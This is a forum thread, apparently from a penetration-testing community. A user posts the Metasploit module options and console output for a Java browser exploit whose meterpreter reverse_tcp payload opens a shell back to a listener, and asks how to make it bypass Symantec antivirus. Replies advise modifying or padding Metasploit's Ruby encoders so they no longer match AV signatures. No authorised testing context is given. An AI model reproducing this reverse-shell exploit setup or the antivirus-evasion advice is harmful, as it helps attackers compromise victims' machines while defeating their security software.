Thread: Need help with Javascript Payload - getting detected by AV

  1. #1
    Just burned his ISO
    Join Date
    May 2012
    Posts
    2

    Need help with Javascript Payload - getting detected by AV

    Hello all,

    I have a question about evading AV with a Javascript payload. Here is my situation:

    I am running BT 5. uname is -
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

    I have updated BT with msfupdate. I am using the 'exploit/multi/browser/java_atomicreferencearray' with payload=java/meterpreter/reverse_tcp. I don't have any problems running this exploit, but when the client connects, the payload is picked up by Symantec antivirus as 'Trojan.Maljava!gen22'.

    Here are the exploit options:
    msf exploit(java_atomicreferencearray) > show options

    Module options (exploit/multi/browser/java_atomicreferencearray):

    Name        Current Setting  Required  Description
    ----        ---------------  --------  -----------
    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT     8080             yes       The local port to listen on.
    SSL         false            no        Negotiate SSL for incoming connections
    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    URIPATH     javasploit       no        The URI to use for this exploit (default is random)

    Payload options (java/meterpreter/reverse_tcp):

    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST  192.168.1.1      yes       The listen address
    LPORT  4444             yes       The listen port

    Here is the output when the exploit is run:
    msf exploit(java_atomicreferencearray) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.1.1:4444
    [*] Using URL: http://0.0.0.0:8080/javasploit3
    [*] Local IP: http://192.168.1.1:8080/javasploit
    msf exploit(java_atomicreferencearray) >
    [*] Server started.
    [*] 192.168.1.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
    [*] 192.168.1.1 java_atomicreferencearray - Generated jar to drop (5287 bytes).
    [*] 192.168.1.1 java_atomicreferencearray - Sending jar
    [*] 192.168.1.1 java_atomicreferencearray - Sending jar
    [*] 192.168.1.1 java_atomicreferencearray - Sending jar

    I have tried using some of the 'evasion' options within the Java exploit but have not had any success. My question is: is there a way to encode the payload with msfencode to successfully bypass AV detection? Let me know if you need more info. Thanks in advance!

  2. #2
    Just burned his ISO
    Join Date
    May 2012
    Posts
    2

    Re: Need help with Javascript Payload - getting detected by AV

    Wow... really... no one has ever encountered this issue before?! I find that hard to believe...

  3. #3
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Re: Need help with Javascript Payload - getting detected by AV

    Sorry, drunk post... deleting.

    BTW, I believe it's the exploit itself that gets detected, not the payload.
    Last edited by jnpa123; 06-03-2012 at 01:01 PM.

  4. #4
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Re: Need help with Javascript Payload - getting detected by AV

    I think it's more the fact that the AV companies are wise to the encoders used in Metasploit, and have signatures for them. If you have a good handle on Ruby, you might try taking one of the existing encoders, and modifying it (or even just inserting some random comments). This might cause enough of a change that Symantec wouldn't catch it (as it didn't match the signature).
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...
